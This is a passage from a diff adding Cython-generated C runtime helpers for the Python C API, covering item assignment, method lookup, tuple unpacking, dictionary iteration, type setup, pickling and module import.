mm->mp_ass_subscript) { + int r; + PyObject *key = PyInt_FromSsize_t(i); + if (unlikely(!key)) return -1; + r = mm->mp_ass_subscript(o, key, v); + Py_DECREF(key); + return r; + } + if (likely(sm && sm->sq_ass_item)) { + if (wraparound && unlikely(i < 0) && likely(sm->sq_length)) { + Py_ssize_t l = sm->sq_length(o); + if (likely(l >= 0)) { + i += l; + } else { + if (!PyErr_ExceptionMatches(PyExc_OverflowError)) + return -1; + PyErr_Clear(); + } + } + return sm->sq_ass_item(o, i, v); + } + } +#else +#if CYTHON_COMPILING_IN_PYPY + if (is_list || (PySequence_Check(o) && !PyDict_Check(o))) +#else + if (is_list || PySequence_Check(o)) +#endif + { + return PySequence_SetItem(o, i, v); + } +#endif + return __Pyx_SetItemInt_Generic(o, PyInt_FromSsize_t(i), v); +} + +/* PyUnicode_Unicode */ +static CYTHON_INLINE PyObject* __Pyx_PyUnicode_Unicode(PyObject *obj) { + if (unlikely(obj == Py_None)) + obj = __pyx_kp_u_None; + return __Pyx_NewRef(obj); +} + +/* PyObjectCallNoArg */ +static CYTHON_INLINE PyObject* __Pyx_PyObject_CallNoArg(PyObject *func) { + PyObject *arg = NULL; + return __Pyx_PyObject_FastCall(func, (&arg)+1, 0 | __Pyx_PY_VECTORCALL_ARGUMENTS_OFFSET); +} + +/* PyObjectGetMethod */ +static int __Pyx_PyObject_GetMethod(PyObject *obj, PyObject *name, PyObject **method) { + PyObject *attr; +#if CYTHON_UNPACK_METHODS && CYTHON_COMPILING_IN_CPYTHON && CYTHON_USE_PYTYPE_LOOKUP + __Pyx_TypeName type_name; + PyTypeObject *tp = Py_TYPE(obj); + PyObject *descr; + descrgetfunc f = NULL; + PyObject **dictptr, *dict; + int meth_found = 0; + assert (*method == NULL); + if (unlikely(tp->tp_getattro != PyObject_GenericGetAttr)) { + attr = __Pyx_PyObject_GetAttrStr(obj, name); + goto try_unpack; + } + if (unlikely(tp->tp_dict == NULL) && unlikely(PyType_Ready(tp) < 0)) { + return 0; + } + descr = _PyType_Lookup(tp, name); + if (likely(descr != NULL)) { + Py_INCREF(descr); +#if defined(Py_TPFLAGS_METHOD_DESCRIPTOR) && Py_TPFLAGS_METHOD_DESCRIPTOR + if (__Pyx_PyType_HasFeature(Py_TYPE(descr), Py_TPFLAGS_METHOD_DESCRIPTOR)) +#elif PY_MAJOR_VERSION >= 3 + #ifdef __Pyx_CyFunction_USED + if (likely(PyFunction_Check(descr) || __Pyx_IS_TYPE(descr, &PyMethodDescr_Type) || __Pyx_CyFunction_Check(descr))) + #else + if (likely(PyFunction_Check(descr) || __Pyx_IS_TYPE(descr, &PyMethodDescr_Type))) + #endif +#else + #ifdef __Pyx_CyFunction_USED + if (likely(PyFunction_Check(descr) || __Pyx_CyFunction_Check(descr))) + #else + if (likely(PyFunction_Check(descr))) + #endif +#endif + { + meth_found = 1; + } else { + f = Py_TYPE(descr)->tp_descr_get; + if (f != NULL && PyDescr_IsData(descr)) { + attr = f(descr, obj, (PyObject *)Py_TYPE(obj)); + Py_DECREF(descr); + goto try_unpack; + } + } + } + dictptr = _PyObject_GetDictPtr(obj); + if (dictptr != NULL && (dict = *dictptr) != NULL) { + Py_INCREF(dict); + attr = __Pyx_PyDict_GetItemStr(dict, name); + if (attr != NULL) { + Py_INCREF(attr); + Py_DECREF(dict); + Py_XDECREF(descr); + goto try_unpack; + } + Py_DECREF(dict); + } + if (meth_found) { + *method = descr; + return 1; + } + if (f != NULL) { + attr = f(descr, obj, (PyObject *)Py_TYPE(obj)); + Py_DECREF(descr); + goto try_unpack; + } + if (likely(descr != NULL)) { + *method = descr; + return 0; + } + type_name = __Pyx_PyType_GetName(tp); + PyErr_Format(PyExc_AttributeError, +#if PY_MAJOR_VERSION >= 3 + "'" __Pyx_FMT_TYPENAME "' object has no attribute '%U'", + type_name, name); +#else + "'" __Pyx_FMT_TYPENAME "' object has no attribute '%.400s'", + type_name, PyString_AS_STRING(name)); +#endif + __Pyx_DECREF_TypeName(type_name); + return 0; +#else + attr = __Pyx_PyObject_GetAttrStr(obj, name); + goto try_unpack; +#endif +try_unpack: +#if CYTHON_UNPACK_METHODS + if (likely(attr) && PyMethod_Check(attr) && likely(PyMethod_GET_SELF(attr) == obj)) { + PyObject *function = PyMethod_GET_FUNCTION(attr); + Py_INCREF(function); + Py_DECREF(attr); + *method = function; + return 1; + } +#endif + *method = attr; + return 0; +} + +/* PyObjectCallMethod0 */ +static PyObject* __Pyx_PyObject_CallMethod0(PyObject* obj, PyObject* method_name) { + PyObject *method = NULL, *result = NULL; + int is_method = __Pyx_PyObject_GetMethod(obj, method_name, &method); + if (likely(is_method)) { + result = __Pyx_PyObject_CallOneArg(method, obj); + Py_DECREF(method); + return result; + } + if (unlikely(!method)) goto bad; + result = __Pyx_PyObject_CallNoArg(method); + Py_DECREF(method); +bad: + return result; +} + +/* RaiseNoneIterError */ +static CYTHON_INLINE void __Pyx_RaiseNoneNotIterableError(void) { + PyErr_SetString(PyExc_TypeError, "'NoneType' object is not iterable"); +} + +/* UnpackTupleError */ +static void __Pyx_UnpackTupleError(PyObject *t, Py_ssize_t index) { + if (t == Py_None) { + __Pyx_RaiseNoneNotIterableError(); + } else if (PyTuple_GET_SIZE(t) < index) { + __Pyx_RaiseNeedMoreValuesError(PyTuple_GET_SIZE(t)); + } else { + __Pyx_RaiseTooManyValuesError(index); + } +} + +/* UnpackTuple2 */ +static CYTHON_INLINE int __Pyx_unpack_tuple2_exact( + PyObject* tuple, PyObject** pvalue1, PyObject** pvalue2, int decref_tuple) { + PyObject *value1 = NULL, *value2 = NULL; +#if CYTHON_COMPILING_IN_PYPY + value1 = PySequence_ITEM(tuple, 0); if (unlikely(!value1)) goto bad; + value2 = PySequence_ITEM(tuple, 1); if (unlikely(!value2)) goto bad; +#else + value1 = PyTuple_GET_ITEM(tuple, 0); Py_INCREF(value1); + value2 = PyTuple_GET_ITEM(tuple, 1); Py_INCREF(value2); +#endif + if (decref_tuple) { + Py_DECREF(tuple); + } + *pvalue1 = value1; + *pvalue2 = value2; + return 0; +#if CYTHON_COMPILING_IN_PYPY +bad: + Py_XDECREF(value1); + Py_XDECREF(value2); + if (decref_tuple) { Py_XDECREF(tuple); } + return -1; +#endif +} +static int __Pyx_unpack_tuple2_generic(PyObject* tuple, PyObject** pvalue1, PyObject** pvalue2, + int has_known_size, int decref_tuple) { + Py_ssize_t index; + PyObject *value1 = NULL, *value2 = NULL, *iter = NULL; + iternextfunc iternext; + iter = PyObject_GetIter(tuple); + if (unlikely(!iter)) goto bad; + if (decref_tuple) { Py_DECREF(tuple); tuple = NULL; } + iternext = __Pyx_PyObject_GetIterNextFunc(iter); + value1 = iternext(iter); if (unlikely(!value1)) { index = 0; goto unpacking_failed; } + value2 = iternext(iter); if (unlikely(!value2)) { index = 1; goto unpacking_failed; } + if (!has_known_size && unlikely(__Pyx_IternextUnpackEndCheck(iternext(iter), 2))) goto bad; + Py_DECREF(iter); + *pvalue1 = value1; + *pvalue2 = value2; + return 0; +unpacking_failed: + if (!has_known_size && __Pyx_IterFinish() == 0) + __Pyx_RaiseNeedMoreValuesError(index); +bad: + Py_XDECREF(iter); + Py_XDECREF(value1); + Py_XDECREF(value2); + if (decref_tuple) { Py_XDECREF(tuple); } + return -1; +} + +/* dict_iter */ +static CYTHON_INLINE PyObject* __Pyx_dict_iterator(PyObject* iterable, int is_dict, PyObject* method_name, + Py_ssize_t* p_orig_length, int* p_source_is_dict) { + is_dict = is_dict || likely(PyDict_CheckExact(iterable)); + *p_source_is_dict = is_dict; + if (is_dict) { +#if !CYTHON_COMPILING_IN_PYPY + *p_orig_length = PyDict_Size(iterable); + Py_INCREF(iterable); + return iterable; +#elif PY_MAJOR_VERSION >= 3 + static PyObject *py_items = NULL, *py_keys = NULL, *py_values = NULL; + PyObject **pp = NULL; + if (method_name) { + const char *name = PyUnicode_AsUTF8(method_name); + if (strcmp(name, "iteritems") == 0) pp = &py_items; + else if (strcmp(name, "iterkeys") == 0) pp = &py_keys; + else if (strcmp(name, "itervalues") == 0) pp = &py_values; + if (pp) { + if (!*pp) { + *pp = PyUnicode_FromString(name + 4); + if (!*pp) + return NULL; + } + method_name = *pp; + } + } +#endif + } + *p_orig_length = 0; + if (method_name) { + PyObject* iter; + iterable = __Pyx_PyObject_CallMethod0(iterable, method_name); + if (!iterable) + return NULL; +#if !CYTHON_COMPILING_IN_PYPY + if (PyTuple_CheckExact(iterable) || PyList_CheckExact(iterable)) + return iterable; +#endif + iter = PyObject_GetIter(iterable); + Py_DECREF(iterable); + return iter; + } + return PyObject_GetIter(iterable); +} +static CYTHON_INLINE int __Pyx_dict_iter_next( + PyObject* iter_obj, CYTHON_NCP_UNUSED Py_ssize_t orig_length, CYTHON_NCP_UNUSED Py_ssize_t* ppos, + PyObject** pkey, PyObject** pvalue, PyObject** pitem, int source_is_dict) { + PyObject* next_item; +#if !CYTHON_COMPILING_IN_PYPY + if (source_is_dict) { + PyObject *key, *value; + if (unlikely(orig_length != PyDict_Size(iter_obj))) { + PyErr_SetString(PyExc_RuntimeError, "dictionary changed size during iteration"); + return -1; + } + if (unlikely(!PyDict_Next(iter_obj, ppos, &key, &value))) { + return 0; + } + if (pitem) { + PyObject* tuple = PyTuple_New(2); + if (unlikely(!tuple)) { + return -1; + } + Py_INCREF(key); + Py_INCREF(value); + PyTuple_SET_ITEM(tuple, 0, key); + PyTuple_SET_ITEM(tuple, 1, value); + *pitem = tuple; + } else { + if (pkey) { + Py_INCREF(key); + *pkey = key; + } + if (pvalue) { + Py_INCREF(value); + *pvalue = value; + } + } + return 1; + } else if (PyTuple_CheckExact(iter_obj)) { + Py_ssize_t pos = *ppos; + if (unlikely(pos >= PyTuple_GET_SIZE(iter_obj))) return 0; + *ppos = pos + 1; + next_item = PyTuple_GET_ITEM(iter_obj, pos); + Py_INCREF(next_item); + } else if (PyList_CheckExact(iter_obj)) { + Py_ssize_t pos = *ppos; + if (unlikely(pos >= PyList_GET_SIZE(iter_obj))) return 0; + *ppos = pos + 1; + next_item = PyList_GET_ITEM(iter_obj, pos); + Py_INCREF(next_item); + } else +#endif + { + next_item = PyIter_Next(iter_obj); + if (unlikely(!next_item)) { + return __Pyx_IterFinish(); + } + } + if (pitem) { + *pitem = next_item; + } else if (pkey && pvalue) { + if (__Pyx_unpack_tuple2(next_item, pkey, pvalue, source_is_dict, source_is_dict, 1)) + return -1; + } else if (pkey) { + *pkey = next_item; + } else { + *pvalue = next_item; + } + return 1; +} + +/* KeywordStringCheck */ +static int __Pyx_CheckKeywordStrings( + PyObject *kw, + const char* function_name, + int kw_allowed) +{ + PyObject* key = 0; + Py_ssize_t pos = 0; +#if CYTHON_COMPILING_IN_PYPY + if (!kw_allowed && PyDict_Next(kw, &pos, &key, 0)) + goto invalid_keyword; + return 1; +#else + if (CYTHON_METH_FASTCALL && likely(PyTuple_Check(kw))) { + if (unlikely(PyTuple_GET_SIZE(kw) == 0)) + return 1; + if (!kw_allowed) { + key = PyTuple_GET_ITEM(kw, 0); + goto invalid_keyword; + } +#if PY_VERSION_HEX < 0x03090000 + for (pos = 0; pos < PyTuple_GET_SIZE(kw); pos++) { + key = PyTuple_GET_ITEM(kw, pos); + if (unlikely(!PyUnicode_Check(key))) + goto invalid_keyword_type; + } +#endif + return 1; + } + while (PyDict_Next(kw, &pos, &key, 0)) { + #if PY_MAJOR_VERSION < 3 + if (unlikely(!PyString_Check(key))) + #endif + if (unlikely(!PyUnicode_Check(key))) + goto invalid_keyword_type; + } + if (!kw_allowed && unlikely(key)) + goto invalid_keyword; + return 1; +invalid_keyword_type: + PyErr_Format(PyExc_TypeError, + "%.200s() keywords must be strings", function_name); + return 0; +#endif +invalid_keyword: + #if PY_MAJOR_VERSION < 3 + PyErr_Format(PyExc_TypeError, + "%.200s() got an unexpected keyword argument '%.200s'", + function_name, PyString_AsString(key)); + #else + PyErr_Format(PyExc_TypeError, + "%s() got an unexpected keyword argument '%U'", + function_name, key); + #endif + return 0; +} + +/* ObjectGetItem */ +#if CYTHON_USE_TYPE_SLOTS +static PyObject *__Pyx_PyObject_GetIndex(PyObject *obj, PyObject *index) { + PyObject *runerr = NULL; + Py_ssize_t key_value; + key_value = __Pyx_PyIndex_AsSsize_t(index); + if (likely(key_value != -1 || !(runerr = PyErr_Occurred()))) { + return __Pyx_GetItemInt_Fast(obj, key_value, 0, 1, 1); + } + if (PyErr_GivenExceptionMatches(runerr, PyExc_OverflowError)) { + __Pyx_TypeName index_type_name = __Pyx_PyType_GetName(Py_TYPE(index)); + PyErr_Clear(); + PyErr_Format(PyExc_IndexError, + "cannot fit '" __Pyx_FMT_TYPENAME "' into an index-sized integer", index_type_name); + __Pyx_DECREF_TypeName(index_type_name); + } + return NULL; +} +static PyObject *__Pyx_PyObject_GetItem_Slow(PyObject *obj, PyObject *key) { + __Pyx_TypeName obj_type_name; + if (likely(PyType_Check(obj))) { + PyObject *meth = __Pyx_PyObject_GetAttrStrNoError(obj, __pyx_n_s_class_getitem); + if (meth) { + PyObject *result = __Pyx_PyObject_CallOneArg(meth, key); + Py_DECREF(meth); + return result; + } + } + obj_type_name = __Pyx_PyType_GetName(Py_TYPE(obj)); + PyErr_Format(PyExc_TypeError, + "'" __Pyx_FMT_TYPENAME "' object is not subscriptable", obj_type_name); + __Pyx_DECREF_TypeName(obj_type_name); + return NULL; +} +static PyObject *__Pyx_PyObject_GetItem(PyObject *obj, PyObject *key) { + PyTypeObject *tp = Py_TYPE(obj); + PyMappingMethods *mm = tp->tp_as_mapping; + PySequenceMethods *sm = tp->tp_as_sequence; + if (likely(mm && mm->mp_subscript)) { + return mm->mp_subscript(obj, key); + } + if (likely(sm && sm->sq_item)) { + return __Pyx_PyObject_GetIndex(obj, key); + } + return __Pyx_PyObject_GetItem_Slow(obj, key); +} +#endif + +/* RaiseUnexpectedTypeError */ +static int +__Pyx_RaiseUnexpectedTypeError(const char *expected, PyObject *obj) +{ + __Pyx_TypeName obj_type_name = __Pyx_PyType_GetName(Py_TYPE(obj)); + PyErr_Format(PyExc_TypeError, "Expected %s, got " __Pyx_FMT_TYPENAME, + expected, obj_type_name); + __Pyx_DECREF_TypeName(obj_type_name); + return 0; +} + +/* FixUpExtensionType */ +#if CYTHON_USE_TYPE_SPECS +static int __Pyx_fix_up_extension_type_from_spec(PyType_Spec *spec, PyTypeObject *type) { +#if PY_VERSION_HEX > 0x030900B1 || CYTHON_COMPILING_IN_LIMITED_API + CYTHON_UNUSED_VAR(spec); + CYTHON_UNUSED_VAR(type); +#else + const PyType_Slot *slot = spec->slots; + while (slot && slot->slot && slot->slot != Py_tp_members) + slot++; + if (slot && slot->slot == Py_tp_members) { + int changed = 0; +#if !(PY_VERSION_HEX <= 0x030900b1 && CYTHON_COMPILING_IN_CPYTHON) + const +#endif + PyMemberDef *memb = (PyMemberDef*) slot->pfunc; + while (memb && memb->name) { + if (memb->name[0] == '_' && memb->name[1] == '_') { +#if PY_VERSION_HEX < 0x030900b1 + if (strcmp(memb->name, "__weaklistoffset__") == 0) { + assert(memb->type == T_PYSSIZET); + assert(memb->flags == READONLY); + type->tp_weaklistoffset = memb->offset; + changed = 1; + } + else if (strcmp(memb->name, "__dictoffset__") == 0) { + assert(memb->type == T_PYSSIZET); + assert(memb->flags == READONLY); + type->tp_dictoffset = memb->offset; + changed = 1; + } +#if CYTHON_METH_FASTCALL + else if (strcmp(memb->name, "__vectorcalloffset__") == 0) { + assert(memb->type == T_PYSSIZET); + assert(memb->flags == READONLY); +#if PY_VERSION_HEX >= 0x030800b4 + type->tp_vectorcall_offset = memb->offset; +#else + type->tp_print = (printfunc) memb->offset; +#endif + changed = 1; + } +#endif +#else + if ((0)); +#endif +#if PY_VERSION_HEX <= 0x030900b1 && CYTHON_COMPILING_IN_CPYTHON + else if (strcmp(memb->name, "__module__") == 0) { + PyObject *descr; + assert(memb->type == T_OBJECT); + assert(memb->flags == 0 || memb->flags == READONLY); + descr = PyDescr_NewMember(type, memb); + if (unlikely(!descr)) + return -1; + if (unlikely(PyDict_SetItem(type->tp_dict, PyDescr_NAME(descr), descr) < 0)) { + Py_DECREF(descr); + return -1; + } + Py_DECREF(descr); + changed = 1; + } +#endif + } + memb++; + } + if (changed) + PyType_Modified(type); + } +#endif + return 0; +} +#endif + +/* ValidateBasesTuple */ +#if CYTHON_COMPILING_IN_CPYTHON || CYTHON_COMPILING_IN_LIMITED_API || CYTHON_USE_TYPE_SPECS +static int __Pyx_validate_bases_tuple(const char *type_name, Py_ssize_t dictoffset, PyObject *bases) { + Py_ssize_t i, n = PyTuple_GET_SIZE(bases); + for (i = 1; i < n; i++) + { + PyObject *b0 = PyTuple_GET_ITEM(bases, i); + PyTypeObject *b; +#if PY_MAJOR_VERSION < 3 + if (PyClass_Check(b0)) + { + PyErr_Format(PyExc_TypeError, "base class '%.200s' is an old-style class", + PyString_AS_STRING(((PyClassObject*)b0)->cl_name)); + return -1; + } +#endif + b = (PyTypeObject*) b0; + if (!__Pyx_PyType_HasFeature(b, Py_TPFLAGS_HEAPTYPE)) + { + __Pyx_TypeName b_name = __Pyx_PyType_GetName(b); + PyErr_Format(PyExc_TypeError, + "base class '" __Pyx_FMT_TYPENAME "' is not a heap type", b_name); + __Pyx_DECREF_TypeName(b_name); + return -1; + } + if (dictoffset == 0 && b->tp_dictoffset) + { + __Pyx_TypeName b_name = __Pyx_PyType_GetName(b); + PyErr_Format(PyExc_TypeError, + "extension type '%.200s' has no __dict__ slot, " + "but base type '" __Pyx_FMT_TYPENAME "' has: " + "either add 'cdef dict __dict__' to the extension type " + "or add '__slots__ = [...]' to the base type", + type_name, b_name); + __Pyx_DECREF_TypeName(b_name); + return -1; + } + } + return 0; +} +#endif + +/* PyType_Ready */ +static int __Pyx_PyType_Ready(PyTypeObject *t) { +#if CYTHON_USE_TYPE_SPECS || !(CYTHON_COMPILING_IN_CPYTHON || CYTHON_COMPILING_IN_LIMITED_API) || defined(PYSTON_MAJOR_VERSION) + (void)__Pyx_PyObject_CallMethod0; +#if CYTHON_USE_TYPE_SPECS + (void)__Pyx_validate_bases_tuple; +#endif + return PyType_Ready(t); +#else + int r; + PyObject *bases = __Pyx_PyType_GetSlot(t, tp_bases, PyObject*); + if (bases && unlikely(__Pyx_validate_bases_tuple(t->tp_name, t->tp_dictoffset, bases) == -1)) + return -1; +#if PY_VERSION_HEX >= 0x03050000 && !defined(PYSTON_MAJOR_VERSION) + { + int gc_was_enabled; + #if PY_VERSION_HEX >= 0x030A00b1 + gc_was_enabled = PyGC_Disable(); + (void)__Pyx_PyObject_CallMethod0; + #else + PyObject *ret, *py_status; + PyObject *gc = NULL; + #if PY_VERSION_HEX >= 0x030700a1 && (!CYTHON_COMPILING_IN_PYPY || PYPY_VERSION_NUM+0 >= 0x07030400) + gc = PyImport_GetModule(__pyx_kp_u_gc); + #endif + if (unlikely(!gc)) gc = PyImport_Import(__pyx_kp_u_gc); + if (unlikely(!gc)) return -1; + py_status = __Pyx_PyObject_CallMethod0(gc, __pyx_kp_u_isenabled); + if (unlikely(!py_status)) { + Py_DECREF(gc); + return -1; + } + gc_was_enabled = __Pyx_PyObject_IsTrue(py_status); + Py_DECREF(py_status); + if (gc_was_enabled > 0) { + ret = __Pyx_PyObject_CallMethod0(gc, __pyx_kp_u_disable); + if (unlikely(!ret)) { + Py_DECREF(gc); + return -1; + } + Py_DECREF(ret); + } else if (unlikely(gc_was_enabled == -1)) { + Py_DECREF(gc); + return -1; + } + #endif + t->tp_flags |= Py_TPFLAGS_HEAPTYPE; +#if PY_VERSION_HEX >= 0x030A0000 + t->tp_flags |= Py_TPFLAGS_IMMUTABLETYPE; +#endif +#else + (void)__Pyx_PyObject_CallMethod0; +#endif + r = PyType_Ready(t); +#if PY_VERSION_HEX >= 0x03050000 && !defined(PYSTON_MAJOR_VERSION) + t->tp_flags &= ~Py_TPFLAGS_HEAPTYPE; + #if PY_VERSION_HEX >= 0x030A00b1 + if (gc_was_enabled) + PyGC_Enable(); + #else + if (gc_was_enabled) { + PyObject *tp, *v, *tb; + PyErr_Fetch(&tp, &v, &tb); + ret = __Pyx_PyObject_CallMethod0(gc, __pyx_kp_u_enable); + if (likely(ret || r == -1)) { + Py_XDECREF(ret); + PyErr_Restore(tp, v, tb); + } else { + Py_XDECREF(tp); + Py_XDECREF(v); + Py_XDECREF(tb); + r = -1; + } + } + Py_DECREF(gc); + #endif + } +#endif + return r; +#endif +} + +/* PyObject_GenericGetAttrNoDict */ +#if CYTHON_USE_TYPE_SLOTS && CYTHON_USE_PYTYPE_LOOKUP && PY_VERSION_HEX < 0x03070000 +static PyObject *__Pyx_RaiseGenericGetAttributeError(PyTypeObject *tp, PyObject *attr_name) { + __Pyx_TypeName type_name = __Pyx_PyType_GetName(tp); + PyErr_Format(PyExc_AttributeError, +#if PY_MAJOR_VERSION >= 3 + "'" __Pyx_FMT_TYPENAME "' object has no attribute '%U'", + type_name, attr_name); +#else + "'" __Pyx_FMT_TYPENAME "' object has no attribute '%.400s'", + type_name, PyString_AS_STRING(attr_name)); +#endif + __Pyx_DECREF_TypeName(type_name); + return NULL; +} +static CYTHON_INLINE PyObject* __Pyx_PyObject_GenericGetAttrNoDict(PyObject* obj, PyObject* attr_name) { + PyObject *descr; + PyTypeObject *tp = Py_TYPE(obj); + if (unlikely(!PyString_Check(attr_name))) { + return PyObject_GenericGetAttr(obj, attr_name); + } + assert(!tp->tp_dictoffset); + descr = _PyType_Lookup(tp, attr_name); + if (unlikely(!descr)) { + return __Pyx_RaiseGenericGetAttributeError(tp, attr_name); + } + Py_INCREF(descr); + #if PY_MAJOR_VERSION < 3 + if (likely(PyType_HasFeature(Py_TYPE(descr), Py_TPFLAGS_HAVE_CLASS))) + #endif + { + descrgetfunc f = Py_TYPE(descr)->tp_descr_get; + if (unlikely(f)) { + PyObject *res = f(descr, obj, (PyObject *)tp); + Py_DECREF(descr); + return res; + } + } + return descr; +} +#endif + +/* PyObject_GenericGetAttr */ +#if CYTHON_USE_TYPE_SLOTS && CYTHON_USE_PYTYPE_LOOKUP && PY_VERSION_HEX < 0x03070000 +static PyObject* __Pyx_PyObject_GenericGetAttr(PyObject* obj, PyObject* attr_name) { + if (unlikely(Py_TYPE(obj)->tp_dictoffset)) { + return PyObject_GenericGetAttr(obj, attr_name); + } + return __Pyx_PyObject_GenericGetAttrNoDict(obj, attr_name); +} +#endif + +/* SetupReduce */ +#if !CYTHON_COMPILING_IN_LIMITED_API +static int __Pyx_setup_reduce_is_named(PyObject* meth, PyObject* name) { + int ret; + PyObject *name_attr; + name_attr = __Pyx_PyObject_GetAttrStrNoError(meth, __pyx_n_s_name); + if (likely(name_attr)) { + ret = PyObject_RichCompareBool(name_attr, name, Py_EQ); + } else { + ret = -1; + } + if (unlikely(ret < 0)) { + PyErr_Clear(); + ret = 0; + } + Py_XDECREF(name_attr); + return ret; +} +static int __Pyx_setup_reduce(PyObject* type_obj) { + int ret = 0; + PyObject *object_reduce = NULL; + PyObject *object_getstate = NULL; + PyObject *object_reduce_ex = NULL; + PyObject *reduce = NULL; + PyObject *reduce_ex = NULL; + PyObject *reduce_cython = NULL; + PyObject *setstate = NULL; + PyObject *setstate_cython = NULL; + PyObject *getstate = NULL; +#if CYTHON_USE_PYTYPE_LOOKUP + getstate = _PyType_Lookup((PyTypeObject*)type_obj, __pyx_n_s_getstate); +#else + getstate = __Pyx_PyObject_GetAttrStrNoError(type_obj, __pyx_n_s_getstate); + if (!getstate && PyErr_Occurred()) { + goto __PYX_BAD; + } +#endif + if (getstate) { +#if CYTHON_USE_PYTYPE_LOOKUP + object_getstate = _PyType_Lookup(&PyBaseObject_Type, __pyx_n_s_getstate); +#else + object_getstate = __Pyx_PyObject_GetAttrStrNoError((PyObject*)&PyBaseObject_Type, __pyx_n_s_getstate); + if (!object_getstate && PyErr_Occurred()) { + goto __PYX_BAD; + } +#endif + if (object_getstate != getstate) { + goto __PYX_GOOD; + } + } +#if CYTHON_USE_PYTYPE_LOOKUP + object_reduce_ex = _PyType_Lookup(&PyBaseObject_Type, __pyx_n_s_reduce_ex); if (!object_reduce_ex) goto __PYX_BAD; +#else + object_reduce_ex = __Pyx_PyObject_GetAttrStr((PyObject*)&PyBaseObject_Type, __pyx_n_s_reduce_ex); if (!object_reduce_ex) goto __PYX_BAD; +#endif + reduce_ex = __Pyx_PyObject_GetAttrStr(type_obj, __pyx_n_s_reduce_ex); if (unlikely(!reduce_ex)) goto __PYX_BAD; + if (reduce_ex == object_reduce_ex) { +#if CYTHON_USE_PYTYPE_LOOKUP + object_reduce = _PyType_Lookup(&PyBaseObject_Type, __pyx_n_s_reduce); if (!object_reduce) goto __PYX_BAD; +#else + object_reduce = __Pyx_PyObject_GetAttrStr((PyObject*)&PyBaseObject_Type, __pyx_n_s_reduce); if (!object_reduce) goto __PYX_BAD; +#endif + reduce = __Pyx_PyObject_GetAttrStr(type_obj, __pyx_n_s_reduce); if (unlikely(!reduce)) goto __PYX_BAD; + if (reduce == object_reduce || __Pyx_setup_reduce_is_named(reduce, __pyx_n_s_reduce_cython)) { + reduce_cython = __Pyx_PyObject_GetAttrStrNoError(type_obj, __pyx_n_s_reduce_cython); + if (likely(reduce_cython)) { + ret = PyDict_SetItem(((PyTypeObject*)type_obj)->tp_dict, __pyx_n_s_reduce, reduce_cython); if (unlikely(ret < 0)) goto __PYX_BAD; + ret = PyDict_DelItem(((PyTypeObject*)type_obj)->tp_dict, __pyx_n_s_reduce_cython); if (unlikely(ret < 0)) goto __PYX_BAD; + } else if (reduce == object_reduce || PyErr_Occurred()) { + goto __PYX_BAD; + } + setstate = __Pyx_PyObject_GetAttrStrNoError(type_obj, __pyx_n_s_setstate); + if (!setstate) PyErr_Clear(); + if (!setstate || __Pyx_setup_reduce_is_named(setstate, __pyx_n_s_setstate_cython)) { + setstate_cython = __Pyx_PyObject_GetAttrStrNoError(type_obj, __pyx_n_s_setstate_cython); + if (likely(setstate_cython)) { + ret = PyDict_SetItem(((PyTypeObject*)type_obj)->tp_dict, __pyx_n_s_setstate, setstate_cython); if (unlikely(ret < 0)) goto __PYX_BAD; + ret = PyDict_DelItem(((PyTypeObject*)type_obj)->tp_dict, __pyx_n_s_setstate_cython); if (unlikely(ret < 0)) goto __PYX_BAD; + } else if (!setstate || PyErr_Occurred()) { + goto __PYX_BAD; + } + } + PyType_Modified((PyTypeObject*)type_obj); + } + } + goto __PYX_GOOD; +__PYX_BAD: + if (!PyErr_Occurred()) { + __Pyx_TypeName type_obj_name = + __Pyx_PyType_GetName((PyTypeObject*)type_obj); + PyErr_Format(PyExc_RuntimeError, + "Unable to initialize pickling for " __Pyx_FMT_TYPENAME, type_obj_name); + __Pyx_DECREF_TypeName(type_obj_name); + } + ret = -1; +__PYX_GOOD: +#if !CYTHON_USE_PYTYPE_LOOKUP + Py_XDECREF(object_reduce); + Py_XDECREF(object_reduce_ex); + Py_XDECREF(object_getstate); + Py_XDECREF(getstate); +#endif + Py_XDECREF(reduce); + Py_XDECREF(reduce_ex); + Py_XDECREF(reduce_cython); + Py_XDECREF(setstate); + Py_XDECREF(setstate_cython); + return ret; +} +#endif + +/* Import */ +static PyObject *__Pyx_Import(PyObject *name, PyObject *from_list, int level) { + PyObject *module = 0; + PyObject *empty_dict = 0; + PyObject *empty_list = 0; + #if PY_MAJOR_VERSION < 3 + PyObject *py_import; + py_import = __Pyx_PyObject_GetAttrStr(__pyx_b, __pyx_n_s_import); + if (unlikely(!py_import)) + goto bad; + if (!from_list) { + empty_list = PyList_New(0); + if (unlikely(!empty_list)) + goto bad; + from_list = empty_list; + } + #endif + empty_dict = PyDict_New(); + if (unlikely(!empty_dict)) + goto bad; + { + #if PY_MAJOR_VERSION >= 3 + if (level == -1) { + if ((1) && (strchr(__Pyx_MODULE_NAME, '.'))) { + #if CYTHON_COMPILING_IN_LIMITED_API + module = PyImport_ImportModuleLevelObject( + name, empty_dict, empty_dict, from_list, 1); + #else + module = PyImport_ImportModuleLevelObject( + name, __pyx_d, empty_dict, from_list, 1); + #endif + if (unlikely(!module)) { + if (unlikely(!PyErr_ExceptionMatches(PyExc_ImportError))) + goto bad; + PyErr_Clear(); + } + } + level = 0; + } + #endif + if (!module) { + #if PY_MAJOR_VERSION < 3 + PyObject *py_level = PyInt_FromLong(level); + if (unlikely(!py_level)) + goto bad; + module = PyObject_CallFunctionObjArgs(py_import, + name, __pyx_d, empty_dict, from_list, py_level, (PyObject *)NULL); + Py_DECREF(py_level); + #else + #if CYTHON_COMPILING_IN_LIMITED_API + module = PyImport_ImportModuleLevelObject( + name, empty_dict, empty_dict, from_list, level); + #else + module = PyImport_ImportModuleLevelObject( + name, __pyx_d, empty_dict, from_list, level); + #endif + #endif + } + } +bad: + Py_XDECREF(empty_dict); + Py_XDECREF(empty_list); + #if PY_MAJOR_VERSION < 3 + Py_XDECREF(py_import); + #endif + return module; +} + +/* ImportDottedModule */ +#if PY_MAJOR_VERSION >= 3 +static PyObject *__Pyx__ImportDottedModule_Error(PyObject *name, PyObject *parts_tuple, Py_ssize_t count) { + PyObject *partial_name = NULL, *slice = NULL, *sep = NULL; + if (unlikely(PyErr_Occurred())) { + PyErr_Clear(); + } + if (likely(PyTuple_GET_SIZE(parts_tuple) == count)) { + partial_name = name; + } else { + slice = PySequence_GetSlice(parts_tuple, 0, count); + if (unlikely(!slice)) + goto bad; + sep = PyUnicode_FromStringAndSize(".", 1); + if (unlikely(!sep)) + goto bad; + partial_name = PyUnicode_Join(sep, slice); + } + PyErr_Format( +#if PY_MAJOR_VERSION < 3 + PyExc_ImportError, + "No module named '%s'", PyString_AS_STRING(partial_name)); +#else +#if PY_VERSION_HEX >= 